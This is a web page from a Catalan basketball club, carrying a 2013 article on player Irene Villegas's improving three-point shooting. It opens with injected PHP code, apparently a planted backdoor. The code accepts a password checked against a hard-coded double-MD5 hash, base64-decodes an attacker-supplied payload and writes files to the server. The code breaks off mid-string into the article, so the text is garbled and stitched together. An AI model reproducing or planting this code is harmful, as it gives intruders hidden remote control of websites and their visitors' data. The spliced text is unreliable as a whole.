function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Irene Villegas afina la punteria - Tgn Bàsquet Club -

Irene Villegas afina la punteria

By
Updated: novembre 14, 2013

“Juanca [Arjona] ens diu que hem de tirar més”. Bona minyona i aplicada, Irene Villegas ha fet cas al seu entrenador i ha anat per feina en els últims partits del Nemser TGN Bàsquet. L’aler s’ha convertit en l’estilet ofensiu del seu equip enllaçant tres partits a gran nivell coincidint amb el millor moment de la temporada del conjunt lila. Amb Villegas en estat de gràcia el Nemser ha sumat dos triomfs en els últims tres partits i la derrota, contra el Sant Nicolau a domicili, es va produir després d’anar guanyat tot el partit i encaixar una cistella dolorosa i decisiva a vuit segons del final. “Estem jugant molt bé i hem demostrat que no ens enfonsem mai encara que anem per darrere en el resultat” analitza la jugadora en relació a la situació de l’equip. Villegas té una mitjana de 22,3 minuts, 10,6 punts (34% de dos, 24% triples, 76% tirs lliures) i 4 rebots en les 8 primeres jornades, però si ens fixem en els tres últims partits els números són molt millors, especialment en el tir de tres punts: 24,3 minuts, 14,3 punts (34% de dos, 50% triples, 66% tirs lliures) i 4,6 rebots. En les cinc primeres jornades Irene Villegas només havia anotat un sol triple (contra l’Esparreguera en la primera jornada) d’un total de 15 intents, és a dir, un 6,6% d’encert. En els tres últims matxs, contra l’Olesa (1/3), el Sant Nicolau (1/3) i el Sedis (3/4), Villegas ha fet una estadística, doncs, de 5/10. “Prefereixo entrar a cistella perquè penso que sempre pots treure més profit, sigui amb una cistella o rebent una falta personal, però confio en el meu tir, crec que és prou bo” assegura la jugadora que admet que està “contenta” amb el seu rendiment ofensiu però no tant amb el defensiu: “Crec que puc aportar més en defensa. La nostra principal arma és el contraatac i per això cal defensar molt fort. Puc millorar encara”. Irene Villegas accepta el paper de jugadora que ha d’assumir la responsabilitat en un equip jove: “En cada equip tothom té la seva funció i sap quins són els seus punts forts. Crec que la meva és generar joc, aportar en atac”.

Malgrat les bones estadístiques que està fent, Villegas vol més i s’autoexigeix en cada partit per tal de no abaixar el llistó competitiu que té ella i l’equip fins ara: “Després de jugar analitzo les errades que he comès. Intento aprendre sempre dels meus errors i no tenir por a assumir la responsabilitat perquè sé que si no ho intento no sabré mai si hagués estat capaç de fer-ho o no”. Villegas afirma que no està entrenant especialment el tir aquest curs, però sí els un contra un, paradoxalment, la seva especialitat: “No estic fent res d’especial per millorar el meu llançament però aquest any sí que noto que he millorat en l’un contra un perquè és un dels aspectes que estem treballant setmanalment als entrenaments”.

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *